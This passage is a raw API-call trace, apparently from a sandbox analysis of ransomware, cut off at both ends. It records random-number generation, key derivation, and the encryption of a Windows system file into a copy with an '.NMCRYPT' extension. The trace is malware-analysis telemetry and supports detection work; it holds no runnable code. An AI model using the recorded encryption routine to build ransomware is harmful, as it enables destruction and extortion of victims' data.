(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.403] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.403] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.404] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0148.405] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.405] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad2b8) returned 1 [0148.405] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0148.405] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0148.405] wcslen (_String="\\\\?\\") returned 0x4 [0148.405] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad5f8) returned 1 [0148.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.406] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.406] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8192) returned 1 [0148.406] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0148.407] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.408] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.408] GetLastError () returned 0x0 [0148.408] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.409] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.410] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.410] GetLastError () returned 0x0 [0148.410] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.410] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.410] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.410] GetLastError () returned 0x0 [0148.410] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.410] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.410] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.410] GetLastError () returned 0x0 [0148.410] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.410] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.410] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.410] GetLastError () returned 0x0 [0148.410] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.410] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.410] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.410] GetLastError () returned 0x0 [0148.410] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.410] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.410] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.410] GetLastError () returned 0x0 [0148.410] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.411] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.411] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.411] GetLastError () returned 0x0 [0148.411] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.411] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.411] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.411] GetLastError () returned 0x0 [0148.411] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.411] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.411] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.411] GetLastError () returned 0x0 [0148.411] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.411] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.411] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.411] GetLastError () returned 0x0 [0148.411] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.411] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.411] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.412] GetLastError () returned 0x0 [0148.412] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.412] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.412] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.412] GetLastError () returned 0x0 [0148.412] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.412] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.412] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.412] GetLastError () returned 0x0 [0148.412] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.412] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.412] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.412] GetLastError () returned 0x0 [0148.412] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.413] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.413] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.413] GetLastError () returned 0x0 [0148.413] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.413] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.413] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.413] GetLastError () returned 0x0 [0148.413] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.413] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.413] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.413] GetLastError () returned 0x0 [0148.413] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.413] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.413] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.413] GetLastError () returned 0x0 [0148.413] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.413] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.413] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.413] GetLastError () returned 0x0 [0148.413] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.413] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.414] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.414] GetLastError () returned 0x0 [0148.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.414] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.414] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.414] GetLastError () returned 0x0 [0148.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 